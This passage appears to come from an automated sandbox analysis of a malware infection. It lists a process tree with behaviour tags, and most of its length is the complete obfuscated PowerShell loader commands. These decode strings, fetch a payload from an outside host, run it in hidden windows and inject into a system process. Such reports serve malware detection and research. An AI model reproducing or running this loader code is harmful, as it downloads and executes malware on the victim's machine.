LaegcseraboUnexcmFor.i.Gudmob hemrForso/RespedKardicSte a/PortrA CentnArbejtSilkeiU,slybS,agtuEndo,rDecimeEndrga UkamuTabankbas arMeraka Gae tUnresiKoo dsunderkaniseeG,ige.QuavetKresth.nlannOejeb ';$livsstraffenes=blodaaren 'Blddy>.idst ';$Politivedtaegt35=blodaaren ' InviiS.ange Seqqx Ambj ';$fistlernes='Unjogged';unormaliteter (blodaaren 'I dfaSEdmuneOv,rbt,ovli-F.rtrCUgrunoMicronomgngt,epateCrustnResemtEk tr Ro.te-To.tePSy,dfa Regrt .ofthrec,i ,attTForre: lode\fart,NHofteeInformKartoaAndertDisseoAttenbNonvil Ot eaTwattsJamaitDetr iFalancSleek.ZelmatSilkex Sesqt Emi, Inca-MiridV .eagaMiltolLejeruTuzl eTilba .trat$Boksef ollaiT.pydsgri.etZoneslImposeAfb.krfr.gonSu laexylo.sHande;Mavep ');unormaliteter (blodaaren 'ImmetiAfrikfBogst Ca t(Bad.ht Tam eOddfes Du,et,asts- BemepregioaTickltSukkehCysts PrehoT Anti:Scru,\Alla,NRul eePasqumben taAnt.atSchmeoD,gsabforbjlDarneaPraess M.rmt,llesiNeuricToppu.anaestAlp axTaxo t Chas)Stats{ ToneeBlackxMeetii Ja,atwellb} Slas;Un,or ');$Undvigende = blodaaren ' UldeeGenucc TherhBarslo Sili Stip%WauliaDeprepPe.itp,ncomdDi pua WangtPulsaaSwizz%U.fac\UdganOBort v Ti relasterKa.ikfW rlhaStormnMin scUdstaiNoradfDambruIndbal.mbasnPresseBlowis ,loes.lanc. RensS.oolai ammerettal Datat& dve& Ju.a AddereRe eecSper hUnintoSn le Gl h$Bunin ';unormaliteter (blodaaren 'Ba.ei$Rotosg,artelMyggeo .ectbEducaa Grftl Desm:Gen,sDOpicoa te,mdGnalldSmkkeePers,lPhloxeSiddenGeokesKarit=Va ua( Ca,pc.dvarmFora.d Spoo Sea,/H ndecA.ara Hara$Ko.eoUImpornbetald,rikkvUb,ufiSuccogReconeleptonstatudPompoeStage)Datte ');unormaliteter (blodaaren 'Medic$ HastgTils.lEkronoRuthebUddhoa ind.lMa ch:ConceUS.alpnDivinlPreaduCotwasParagtOvertfSkorsuRentel .okul dheryOscit=An.le$.llneMkneblaVarmanAmneslMedaliTeletlJtpr yFlyse.OmkarsDestipOverflBan,eiHabi,tLrerr(Epitr$Spor,lPejasi ,ptavJvn,nsRegimsCithrtFrafarsulfoaForbrfSup,rfProdue AdrenKaukaeU.spesIrbit)Rghtt ');$Manlily=$Unlustfully[0];unormaliteter (blodaaren 'creat$Lav,og Missl staroE,heobSamara Scotl Ramp: InpaKWastseante.nParisd lagseTripho GldsrKnogld fljteH ldntH,roesTurnu=TipvoNDitcheBurbew Enco-,lektOFo,prbVindej,ikahe Tr mc.illgtvandk .laysSGlatiyJonoss Uniwt RolieAu.otm korp.SoldrNCabsteUnd rtsubsc.T.irlWbceuneBillebDia.eC Tra lS.teriFil peGngennBoometBurgo ');unormaliteter (blodaaren 'Nedbr$Al aqKIntrueSulfanKau.idVeriteTresso.xclarhyperd MiddeFejlrtLeucosStart. diacHNi,oneUnw,eaMo,sedCobureKom,lr belesMoll.[efter$InterUL gikiUriasg InqueUgeranPastanSooree st,lmDecors PlerkKomm uUltraeSma,llarctaiVermig Sgevhvid,neBondadCovareHjtidrWarstnBeanseBrysts mgen]Logom=C.dar$ IndpADmonip,ussep Undfl To.eiEnglikHistoa onretSatraiHastio Am,rnOutbos Lav u.ejted a trv jrneiTrovrkKvrknl,imideSammerUdstreBedmmsCirri ');$Fagmndene207=blodaaren 'TetraK layeeScho.nSubchdStraneS licoSkiferHomerdHemioe aafut ByposTungs.IndleDUf,rnoB drawRowd.nAm.hil dvrgoSt,rma ildkdambenFindeniTrommlRefraeLsbla(Outju$KraftMPhoneaR.tranforsgl ShiliprodulAr.ejySkist,Clair$ stilI se,wdYdmy,o Ur,ll lovla.teros,opcotMon iedon crGrund)Tachi ';$Fagmndene207=$Daddelens[1]+$Fagmndene207;$Idolaster=$Daddelens[0];unormaliteter (blodaaren 'Preme$Semi gKvaddl L.ppoRettebKnleraOystel.aunt: Met.f OzonoVsensrKolofeUnretsG.rmapArcuarSpireg KoloeBiller.utpreCh.lis Dugd=Traur(Udki.TVagabeAnalys Prabt Cent-BaadpPCognaaAnglotGteskhMiljt Frenz$ EjerIUnci dOpraaoKudsklSascha .ahus,erehtColbye vindr Sera)Parad ');while (!$foresprgeres) {unormaliteter (blodaaren ' Betn$Ove,rgHankelO,erfoPleocbhexagaVib.alTermo:Vi,idt HandhTrldoePa,llgPhanee MeditRea,lh TonaejumblrPre c=E alu$ExinetdinnyrPostiu,ragte,exol ') ;unormaliteter $Fagmndene207;unormaliteter (blodaaren 'Pens.SLahndtBerryaYve.er OrgatDelto-ChoanSLnnedlH.droeEnc,aeKontrpNonem Del g4sever ');unormaliteter (blodaaren 'Heart$ O ergUn ltlAlcheoOrnitbDevilaK jsel Sept:Des,efPalaeoTehttrRelaxeWolfhsAnkompMorb,rUndergSkrueeOmr irp oble Lsers Ambr= Sac,( AutoT lotteb.indsSprgst She.-MiliePRealkaS,udet .hlyhPrete Warde$AprilIC pildBelyso Try lHotboaAntimsRegnst.arakeKroejrNoct )P,ych ') ;unormaliteter (blodaaren 'S.uns$Jackig Spill TeksoKendebStresabrevvlNysge: Dkl KsundolGreenoRgt paFauvikRethofRiccobBarytr Revi= .til$Membrg Wat,lS askoFiberbPockeaManeulredun:UdkmpF g,unoStoneg Und eSmaald Pr beDel,unDunc.+Forto+I flu%In,on$DacapUIndtrn Ni.elKon,ruGnidnsBletttS husf .kteuUnmarls.noplKrebiyBefin.DegercPou coRunifuAutomnPolistPolyp ') ;$Manlily=$Unlustfully[$Kloakfbr];}$Tob=335294;$Dobbeltfunktioner=29970;unormaliteter (blodaaren 'Ar ej$.ystigOmlsnl Svr,oSilicb kkumaCzigalJour :Poly BBluffaBolterLoreld TambuAthennunsoceVaadbnDenta Unb,=Unsi. procoGA,rune TvrstUnob.-G,sboC .ommocamemnClaswtLan ge Fu,enBellatad pt Koreo$EngagI ForbdFortrodobbil ictuaSkrubsRistitDkspleRedukrHolog ');unormaliteter (blodaaren ' .vis$AcquigCamoulCa.omoKvalibExpilaSkimelFroko:Al.ksS PadmiUdrejmRe.aybHermolEn,ido Reg tRegi Pla,k=Trele Verdi[AnomaSForkly ZygosKli.st.ingfePachymFiffi.BevilCGrabhoSkraan DuefvHagfieBa,ksrd,sint Oare] Qua :Skovm:berenF tokrMetr,oBlearmTriniBArguma MalesVatteeFriti6 Ham,4SelskSOutdotAtmosrUroski Nor,nSamm,gPille( puni$ odinB FormaBemrkrK,adrdReedtuAngi,nUninfe surnUntho)Uvalc ');unormaliteter (blodaaren ' Tegn$RetingPic plMadefo EmmebZanneaHavnel Wina:BoniaP InstrPentee BirtaPre.ecAngusc kaaleH,estpEne.gtApplisPhoto N.kke=Va gb Ipse [ IdioSTypogy Orgas.upertDisc e Tra,mInva .InterTTempeeList.xCyklot Frem.B.graEOpfinn grunc ContoElem dDegluiGrevmn Bag gSapie]s,ort:well.:cleisASpjttSApanaC,rcshIAuripIfldeo.TjeneG,egrae BismtSush,SZent tStercr,pinii Progn BaktgPjask(Telef$NavigSEpisti akuumDirecb,mforlferocoAntict Genn) Cons ');unormaliteter (blodaaren ' Khag$ByomrgSynkrl,pilloBrndbbTel eaOmlssl.ackf:TicalEGrilndAk,iaeBe oklFlorigTyp.gaPisknvAndejeHulki=Ubrug$Du,lePpreopr P.ngeRoguiaEpitecBagstcTorske FrempSprngt Un xs H,nd.Hygros,gorauarchibS.igrsSumm tPanorrDeme,iProdun Styrgcereb(Monom$,lvemTWigleoKispubSand,, Letm$SonogDAntiooSb adbFu,zib FasteNotesl O,ertSkolsfReaveuSubmunEncyckModtatRuthlibazooo MlxdnFeriee Relir Tids)Nonap ');unormaliteter $Edelgave;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Overfancifulness.Sir && echo $"
7⤵
PID:4048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Capulin = 1;$Kontakia='Su';$Kontakia+='bstrin';$Kontakia+='g';Function blodaaren($Fjernvarmecentralens){$Repudiation=$Fjernvarmecentralens.Length-$Capulin;For($Flocci=5;$Flocci -lt $Repudiation;$Flocci+=6){$Acidy+=$Fjernvarmecentralens.$Kontakia.Invoke( $Flocci, $Capulin);}$Acidy;}function unormaliteter($Urocoptis116){& ($Politivedtaegt35) ($Urocoptis116);}$Applikationsudvikleres=blodaaren 'DermaMT,baloNuncuzFlestiSkretl ,nellUdhunaUpgro/Still5Nonbo.Saute0Sexfi Raaka(DatadWTil.viPosi,n TromdSpu,soWreckwCon hsCreti CatguNDisclTtr.ll Super1Bo db0Re,ub.urete0commo;Rough decigWDetaii vitan arne6Bille4Sam e; Skri Udp bxC,rpu6Reedh4Suici;F ltr Skrfer in,evErika:Ho.iz1She t2fengh1In.ro. Rum.0Unde.)Inaug JuditG Antie st,icholmikBeboeo ovje/Exter2Molot0Lenit1.illf0Elide0Raw.n1Miljb0Biote1 Knog KmpegFSatsbiskrifrRegaleDescef.ovedo Sk dxSkai./ Halv1Gleam2 Afte1 Voms.Spaak0Svane ';$Uigennemskuelighedernes=blodaaren 'archiUEndossFdekae astrr Sulf- SjofA P osgSluseeAndennWard,t,essp ';$Manlily=blodaaren 'affu hPlangt selst,rinepindr,s erin:Henle/ .ygr/HeptarElvera Redin s,vsc A,ulhStylio hildbCa.aloStransOptagcRoyalaCorrarL.febdForhaiPa ten v,di. LaegcseraboUnexcmFor.i.Gudmob hemrForso/RespedKardicSte a/PortrA CentnArbejtSilkeiU,slybS,agtuEndo,rDecimeEndrga UkamuTabankbas arMeraka Gae tUnresiKoo dsunderkaniseeG,ige.QuavetKresth.nlannOejeb ';$livsstraffenes=blodaaren 'Blddy>.idst ';$Politivedtaegt35=blodaaren ' InviiS.ange Seqqx Ambj ';$fistlernes='Unjogged';unormaliteter (blodaaren 'I dfaSEdmuneOv,rbt,ovli-F.rtrCUgrunoMicronomgngt,epateCrustnResemtEk tr Ro.te-To.tePSy,dfa Regrt .ofthrec,i ,attTForre: lode\fart,NHofteeInformKartoaAndertDisseoAttenbNonvil Ot eaTwattsJamaitDetr iFalancSleek.ZelmatSilkex Sesqt Emi, Inca-MiridV .eagaMiltolLejeruTuzl eTilba .trat$Boksef ollaiT.pydsgri.etZoneslImposeAfb.krfr.gonSu laexylo.sHande;Mavep ');unormaliteter (blodaaren 'ImmetiAfrikfBogst Ca t(Bad.ht Tam eOddfes Du,et,asts- BemepregioaTickltSukkehCysts PrehoT Anti:Scru,\Alla,NRul eePasqumben taAnt.atSchmeoD,gsabforbjlDarneaPraess M.rmt,llesiNeuricToppu.anaestAlp axTaxo t Chas)Stats{ ToneeBlackxMeetii Ja,atwellb} Slas;Un,or ');$Undvigende = blodaaren ' UldeeGenucc TherhBarslo Sili Stip%WauliaDeprepPe.itp,ncomdDi pua WangtPulsaaSwizz%U.fac\UdganOBort v Ti relasterKa.ikfW rlhaStormnMin scUdstaiNoradfDambruIndbal.mbasnPresseBlowis ,loes.lanc. RensS.oolai ammerettal Datat& dve& Ju.a AddereRe eecSper hUnintoSn le Gl h$Bunin ';unormaliteter (blodaaren 'Ba.ei$Rotosg,artelMyggeo .ectbEducaa Grftl Desm:Gen,sDOpicoa te,mdGnalldSmkkeePers,lPhloxeSiddenGeokesKarit=Va ua( Ca,pc.dvarmFora.d Spoo Sea,/H ndecA.ara Hara$Ko.eoUImpornbetald,rikkvUb,ufiSuccogReconeleptonstatudPompoeStage)Datte ');unormaliteter (blodaaren 'Medic$ HastgTils.lEkronoRuthebUddhoa ind.lMa ch:ConceUS.alpnDivinlPreaduCotwasParagtOvertfSkorsuRentel .okul dheryOscit=An.le$.llneMkneblaVarmanAmneslMedaliTeletlJtpr yFlyse.OmkarsDestipOverflBan,eiHabi,tLrerr(Epitr$Spor,lPejasi ,ptavJvn,nsRegimsCithrtFrafarsulfoaForbrfSup,rfProdue AdrenKaukaeU.spesIrbit)Rghtt ');$Manlily=$Unlustfully[0];unormaliteter (blodaaren 'creat$Lav,og Missl staroE,heobSamara Scotl Ramp: InpaKWastseante.nParisd lagseTripho GldsrKnogld fljteH ldntH,roesTurnu=TipvoNDitcheBurbew Enco-,lektOFo,prbVindej,ikahe Tr mc.illgtvandk .laysSGlatiyJonoss Uniwt RolieAu.otm korp.SoldrNCabsteUnd rtsubsc.T.irlWbceuneBillebDia.eC Tra lS.teriFil peGngennBoometBurgo ');unormaliteter (blodaaren 'Nedbr$Al aqKIntrueSulfanKau.idVeriteTresso.xclarhyperd MiddeFejlrtLeucosStart. diacHNi,oneUnw,eaMo,sedCobureKom,lr belesMoll.[efter$InterUL gikiUriasg InqueUgeranPastanSooree st,lmDecors PlerkKomm uUltraeSma,llarctaiVermig Sgevhvid,neBondadCovareHjtidrWarstnBeanseBrysts mgen]Logom=C.dar$ IndpADmonip,ussep Undfl To.eiEnglikHistoa onretSatraiHastio Am,rnOutbos Lav u.ejted a trv jrneiTrovrkKvrknl,imideSammerUdstreBedmmsCirri ');$Fagmndene207=blodaaren 'TetraK layeeScho.nSubchdStraneS licoSkiferHomerdHemioe aafut ByposTungs.IndleDUf,rnoB drawRowd.nAm.hil dvrgoSt,rma ildkdambenFindeniTrommlRefraeLsbla(Outju$KraftMPhoneaR.tranforsgl ShiliprodulAr.ejySkist,Clair$ stilI se,wdYdmy,o Ur,ll lovla.teros,opcotMon iedon crGrund)Tachi ';$Fagmndene207=$Daddelens[1]+$Fagmndene207;$Idolaster=$Daddelens[0];unormaliteter (blodaaren 'Preme$Semi gKvaddl L.ppoRettebKnleraOystel.aunt: Met.f OzonoVsensrKolofeUnretsG.rmapArcuarSpireg KoloeBiller.utpreCh.lis Dugd=Traur(Udki.TVagabeAnalys Prabt Cent-BaadpPCognaaAnglotGteskhMiljt Frenz$ EjerIUnci dOpraaoKudsklSascha .ahus,erehtColbye vindr Sera)Parad ');while (!$foresprgeres) {unormaliteter (blodaaren ' Betn$Ove,rgHankelO,erfoPleocbhexagaVib.alTermo:Vi,idt HandhTrldoePa,llgPhanee MeditRea,lh TonaejumblrPre c=E alu$ExinetdinnyrPostiu,ragte,exol ') ;unormaliteter $Fagmndene207;unormaliteter (blodaaren 'Pens.SLahndtBerryaYve.er OrgatDelto-ChoanSLnnedlH.droeEnc,aeKontrpNonem Del g4sever ');unormaliteter (blodaaren 'Heart$ O ergUn ltlAlcheoOrnitbDevilaK jsel Sept:Des,efPalaeoTehttrRelaxeWolfhsAnkompMorb,rUndergSkrueeOmr irp oble Lsers Ambr= Sac,( AutoT lotteb.indsSprgst She.-MiliePRealkaS,udet .hlyhPrete Warde$AprilIC pildBelyso Try lHotboaAntimsRegnst.arakeKroejrNoct )P,ych ') ;unormaliteter (blodaaren 'S.uns$Jackig Spill TeksoKendebStresabrevvlNysge: Dkl KsundolGreenoRgt paFauvikRethofRiccobBarytr Revi= .til$Membrg Wat,lS askoFiberbPockeaManeulredun:UdkmpF g,unoStoneg Und eSmaald Pr beDel,unDunc.+Forto+I flu%In,on$DacapUIndtrn Ni.elKon,ruGnidnsBletttS husf .kteuUnmarls.noplKrebiyBefin.DegercPou coRunifuAutomnPolistPolyp ') ;$Manlily=$Unlustfully[$Kloakfbr];}$Tob=335294;$Dobbeltfunktioner=29970;unormaliteter (blodaaren 'Ar ej$.ystigOmlsnl Svr,oSilicb kkumaCzigalJour :Poly BBluffaBolterLoreld TambuAthennunsoceVaadbnDenta Unb,=Unsi. procoGA,rune TvrstUnob.-G,sboC .ommocamemnClaswtLan ge Fu,enBellatad pt Koreo$EngagI ForbdFortrodobbil ictuaSkrubsRistitDkspleRedukrHolog ');unormaliteter (blodaaren ' .vis$AcquigCamoulCa.omoKvalibExpilaSkimelFroko:Al.ksS PadmiUdrejmRe.aybHermolEn,ido Reg tRegi Pla,k=Trele Verdi[AnomaSForkly ZygosKli.st.ingfePachymFiffi.BevilCGrabhoSkraan DuefvHagfieBa,ksrd,sint Oare] Qua :Skovm:berenF tokrMetr,oBlearmTriniBArguma MalesVatteeFriti6 Ham,4SelskSOutdotAtmosrUroski Nor,nSamm,gPille( puni$ odinB FormaBemrkrK,adrdReedtuAngi,nUninfe surnUntho)Uvalc ');unormaliteter (blodaaren ' Tegn$RetingPic plMadefo EmmebZanneaHavnel Wina:BoniaP InstrPentee BirtaPre.ecAngusc kaaleH,estpEne.gtApplisPhoto N.kke=Va gb Ipse [ IdioSTypogy Orgas.upertDisc e Tra,mInva .InterTTempeeList.xCyklot Frem.B.graEOpfinn grunc ContoElem dDegluiGrevmn Bag gSapie]s,ort:well.:cleisASpjttSApanaC,rcshIAuripIfldeo.TjeneG,egrae BismtSush,SZent tStercr,pinii Progn BaktgPjask(Telef$NavigSEpisti akuumDirecb,mforlferocoAntict Genn) Cons ');unormaliteter (blodaaren ' Khag$ByomrgSynkrl,pilloBrndbbTel eaOmlssl.ackf:TicalEGrilndAk,iaeBe oklFlorigTyp.gaPisknvAndejeHulki=Ubrug$Du,lePpreopr P.ngeRoguiaEpitecBagstcTorske FrempSprngt Un xs H,nd.Hygros,gorauarchibS.igrsSumm tPanorrDeme,iProdun Styrgcereb(Monom$,lvemTWigleoKispubSand,, Letm$SonogDAntiooSb adbFu,zib FasteNotesl O,ertSkolsfReaveuSubmunEncyckModtatRuthlibazooo MlxdnFeriee Relir Tids)Nonap ');unormaliteter $Edelgave;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Overfancifulness.Sir && echo $"
8⤵
PID:3120

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kucgtn.cmd" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Anlia171 = 1;$Bouvardias='Su';$Bouvardias+='bstrin';$Bouvardias+='g';Function Generative($Seminudity){$monkery=$Seminudity.Length-$Anlia171;For($Unrounds=5;$Unrounds -lt $monkery;$Unrounds+=6){$Blockmaker+=$Seminudity.$Bouvardias.Invoke( $Unrounds, $Anlia171);}$Blockmaker;}function Telefonforbindelsernes($kvantums){. ($Emblematicise) ($kvantums);}$Hoody=Generative 'OutquMVaebnoEllenzPra.siPollil allalRanzaaApart/Repla5 Bitt.Ski k0 K,nd Filka(AnnihWImpori AnomnUkenddBlyhooKontrwOverfs osch CigarNDriftT.reng .rgi1Stats0Aadri.Retr,0Curar;Tvrma OmhygW,rolliWryn.nArabi6Garve4 Thai;Orth. Talonx Aphi6.otal4S emm;Poste Fedtr L.mevTelef:Jumpy1 nfo2 ,iti1Hemic.Tegne0Sfrer) Id.n PseudGLiquoeDeificgushik Eskao,ugen/Spurm2Bssem0Staff1Indle0F.nkt0 .ulf1Pusle0Cran,1c dde HovedFPrintiDigesrKontueTheirfBes ioLatrix Jeri/,alco1Syn n2 yol,1Sacre.Kaplb0Femaa ';$kongetitels=Generative 'SkideULigelsF edne PermrKe.ne-UheldARedstgElem.eRestonOpvart luc ';$Decrepitness=Generative ' SquahNonhetHetert LagrpOptimsA ria: L,ri/ Caut/Li,strSelekaLessenIntoxcKitl hHjemmo DrifbOmtaloBabyssBiedecFangeaJrlior DokudRdkaaiProjenReabo.Compuc Art o Sp.imSk.kt.AvertbL,ptor Skrd/VirksdOphicc V,rd/biskoGKvoter ShaueJaniteNyerhn Gulvs irupagyth nFri,fdCop i.Bombao ntecPaganxVelfr ';$Sparging=Generative 'Afkod> Int, ';$Emblematicise=Generative 'DogcaiSperle Dyppx Akaz ';$Fish='Afstaliniserende';Telefonforbindelsernes (Generative '.anetS ublueBortctstrmk- .endCCysteo deenUnv.bt,ultue Br.sn Subst Au.o bista- MariPforaya NucltProprhchrom KontaTLigus: Auto\.ainsADrotseCyt.krAmbeeoJubarlThemsiandentSteaniCalcicSobbi.krerptLnkamxConf tUnbad Knska- StivV Za.ia Id llReturu Tra e Unde Forse$UdsprF Indii Aceds R sth u,ro;Unrec ');Telefonforbindelsernes (Generative 'Domi iSlvklfMyt,o Aftra(TerybtMaksie Skr,sTol.btGenne- A,prpTyveraSer.ltPatinhTrigl Loka,TScant:Mjdet\NibliANondeeRysler Parao,alaxlTeodiiasciit.dfrsi.oaorcpeber.Non atBenzixNonnetOpera)Il,eb{ Farae Ex exFiguriForsttHauss}Pa kv;Kvato ');$Drikkevareemballagen = Generative 'Ka,toeG.nfrcDvehjhReligoTurbo Mosqu% entraB,hndpMisawpHerredKaloraEppiet .ollaAfsla%Dandy\ RemeSSt,ckk ythii Sa,gn FrstbWir raiblanrStaillMaskli Clerg Hfebe pernrSaccoeEgebrsstatu1engan5Behov6bogho.Brunan FylkaPatrutanti, inte& Trv.&Tyks. TyraneAdynac egomh Dr.go cra logar$Splen ';Telefonforbindelsernes (Generative 'Stu m$SalvogSoci.lBenkro HotdbAccelaEthlylSuper:XihypTDobbeoBillepSnubbf entlGudsbiEmuleg yrevhSage tUpbol=Svin (Eftercfiffim PresdVival Krypt/gnathcDy de Onera$IdiomDBorndrOutc iSpaankIdolakIlfrdeObstavCalipaNonnerF,rreemrkvreKonsemRredeb.analaSlugtl Natilwhitta L gegFlyvreManchnKathu)Hyper ');Telefonforbindelsernes (Generative 'Vris.$Spi.egSub elResboo Learb Cod.aK.mpdlMecha:Va drVPalaeoOdou,l jerd,ambusgaves=Obsk,$Smre D,pokoeTogp.cSuperrK,rsue BrutpLsideiBal.ntRefranHrguleAlim sTweaksUnenc.B.roksVentrpInfielOnom,i MeditAnn,t( Haje$NeapoSBktnipGlaciaMinyarAlbumgUnwari elefn SassgMikae)Re.ud ');$Decrepitness=$Volds[0];Telefonforbindelsernes (Generative 'Ener.$Vatu,gTitanlD,rmaospaadbSche aSjovelLeadw: TrutSGennet,nuckuSygdodHa.mliStudie Kobblultrae Hjesg P,laaRubbetGaulseH.arsrSpea.sCo te= JudoNVulneeIrl.nwUnip -RetriO SamfbHjspnjAmphie Comac S,mftOut o ChlorS lbniyreavesledtstSkrifeTourtmGrupp. ByggN imeneBetnktAxoid.sync.WDyreae BlaabFabriCNatiolFungoiTeleoeDessenHovedtAccep ');Telefonforbindelsernes (Generative 'Frafa$ alliS SabrtKrydsuUnweldAutomiMicroeAktivlAppaleCentrg isosaTal,ctKonste ResyrMuckssUn.er.FilmeHGoatpeVes.iaK,lded H,deemde arForess Skak[Tredv$ VurdkSinkbo.rdoknDolerg DvrgeNonsatTarmeiGenestAfpareunhollsinlis Iden] T.ot= lact$AtreiH Tse,o udtmoUntrudLimpayEmbro ');$Acidology=Generative 'E spoSSprogtTribauUratod Fwdbi harteChemol Ambie Rekogtamera Implt Chece,ndarrKaldssFor,a.circuDComatoVandewFlippnTar el samfo AakaaHeterdsklerFVoyagibuffelConcee Ador(Has n$L.retD.ingsePhilocToa,rrOv.rseVi,ksp SilkiLanthtVok,vnCas ieD.matsAryb,sTraj.,W,eyl$ProteSTurc t Foraa MundmBoldekProtoa Grenf Mellf DepeuSh.veeStillnCondi)Drivh ';$Acidology=$Topflight[1]+$Acidology;$Stamkaffuen=$Topflight[0];Telefonforbindelsernes (Generative 'Minia$ Roseg OpsilFornjoSagsbb KodeabondslExote:SantoICh onr KonfoKaritnInkaswSkrueoBeskyrSparktnonex=Vi,ev(KatodTMarskeStriksIncartHafga-Ska eP Un raBombat RomahHa,sl Servi$BlufrS.aroltSangsaS,ewhm arigkUntwiaHentyf ItonfExostuLign e Fregn Frem) Kool ');while (!$Ironwort) {Telefonforbindelsernes (Generative 'Inte,$.alavgSwainl,tartoFar.obAntita,lowflSuber:Ner,eK S.enlAfblaiAksi,tHjmaroMede,rEndnoicrochsFormusIncomeL.vtrr imponTeleseDiske=Ls ng$SkrmstpietrrCheapuRundfeSte.e ') ;Telefonforbindelsernes $Acidology;Telefonforbindelsernes (Generative 'aflevSStandtAstriaKorserTanketBookk-NonreSRaa sl UdbreJoiniePremapTek,t Fraud4Vo at ');Telefonforbindelsernes (Generative 'Hyste$UndergBirthlV,jrpoT hvebSpndiaSemial A gu:TosepI .sserSmughoWhitenFyrigw Ponco Beaar reagtS.ott=Kugle( DyssTSclere ,bdosOverptLnr,g- AritPGaffeaDipthtUninhhImpli Civi$KogenSHaandtDess aExtermRutsjk A,kua SuwefVintefOe.onu SidseFolkenSaddl)In il ') ;Telefonforbindelsernes (Generative 'Talen$Bankvg Ted.lObl goBilggb StilaSprinlFjset:SaxofEApollmForynaMo.uln Limaaom ivtFladbiO ersoOlva,nReagee ,onsnCarri2S raw3Tropi9 Down=.irel$gobblgDampnlrepinoFilicb.indea NgstlOphed:I.terBRacemrBaskeaTomesmProjefLegpirriotii gurgt Blin+,eton+Resig%papay$TrsteVEkspao JasplRefo.dunbolsMarke..oneycEkspro FusluSanktn Morat Uige ') ;$Decrepitness=$Volds[$Emanationen239];}$Tantawy=293146;$reconsolidated=28794;Telefonforbindelsernes (Generative ' L qu$OptimgstramlPrjseo SardbGyro,aMrtlelHensi:Re,owB Alt lComp,apa ankBrokakundereArrakrCry nnDannee drivsRocke Annun= em.t UdtvrGTjrene,pokrtChrys- Sk.fC CorpoC.acknAbject Chaue usinn.impetUnerr Jacks$DioscS InditSnowbaMagnemCom ek.ompra Brodf OpvufRek,iuHypnoeAuladn.egej ');Telefonforbindelsernes (Generative 'Jour $nonphgSa,tulVandroGr,jeb MetoaKn cklExoph:SmackE BekeuStr,nkK blea.agnelKnas,yLarvap KosatDismaurit.rsmaoisscep aeKodifnMise Ha s= Utrt mi ju[VoldtSEva,uy nwas K,ustParite slagmMadse.Dith,CBulkhoHowesnFringvClonaeCh onr,ennitRoedm]Anom :Nat.e: S.ltF Seddr .pono UdsymOcci,BAn.ipa Modis,dspeeFrans6Foroe4StagvSAliamtFebrirS.ramiB.sionSlemmgm,rro(Reass$Pri,aBFld.nlNonfra.ggshkFromlk,nsufe PingrRemmen illeetoskisVidim) Gala ');Telefonforbindelsernes (Generative 'forka$Kor.sg,roholDiskooSouplbPillaaSmaasl peri:BerusK TalseSpoormKalveiFilmakUrokka eetlBra.mi Euphe,atioiAril.nQ artd UndvuEttlisTosprtHan erR fraiCh sss Ku o inn m=Elect Udstr[ HjfrSSpinly.nomosCounttMethyeSvam mConcr.HawaiT HedgeU,ochxCoexitFor.r.UnderE Gantnu.paycBiogros,anddTimidiUred,nG bangSemis]Bemal: Hand:Sh ppA NounS,entaCAffugITekstIJordv.KaryoG bra,e SkoltHexa,SBer tt TrufrSo.siiOverdn vigugBikse(Su,ve$AnnelESc,oou Tensk ineaaFarr lThougy ReagpSwitct InfouSknsasSynagsProgre.edton Pe c) Af,r ');Telefonforbindelsernes (Generative 'Litho$ BombgPomerlF rvnoBetjebexpliaF,ipolSequa: PermOwittipSmigvhuimo aIn.usvLnudvsVari rU cogeLobbitMetalschromb Exene AarsswantakTidsfyLocultDextrtP boieUgunsdPaleoegudsf=Destr$Gla oKFlleseMinermBiss.iIntrakHomoiaHimmelSnrini MjsoeResp.iChamanSplend S euu P.eusCircutHolt,rTil riWestss auss.Blueps ,ynauUngd,bStrymsFarvntTale r Te,ni TcawnVad fg Str,(Afg.f$An itTSeko,a,nexpnDisartUfremaSimulw Refuylevne,Afsen$ MassrPteroe RadicUrerso BothnK,mmesBiorhofarmslG.mnaiFor ad,tkama GeartTubefeUnderdGoatl)Basis ');Telefonforbindelsernes $Ophavsretsbeskyttede;"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skinbarligeres156.nat && echo $"
7⤵
PID:2704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Anlia171 = 1;$Bouvardias='Su';$Bouvardias+='bstrin';$Bouvardias+='g';Function Generative($Seminudity){$monkery=$Seminudity.Length-$Anlia171;For($Unrounds=5;$Unrounds -lt $monkery;$Unrounds+=6){$Blockmaker+=$Seminudity.$Bouvardias.Invoke( $Unrounds, $Anlia171);}$Blockmaker;}function Telefonforbindelsernes($kvantums){. ($Emblematicise) ($kvantums);}$Hoody=Generative 'OutquMVaebnoEllenzPra.siPollil allalRanzaaApart/Repla5 Bitt.Ski k0 K,nd Filka(AnnihWImpori AnomnUkenddBlyhooKontrwOverfs osch CigarNDriftT.reng .rgi1Stats0Aadri.Retr,0Curar;Tvrma OmhygW,rolliWryn.nArabi6Garve4 Thai;Orth. Talonx Aphi6.otal4S emm;Poste Fedtr L.mevTelef:Jumpy1 nfo2 ,iti1Hemic.Tegne0Sfrer) Id.n PseudGLiquoeDeificgushik 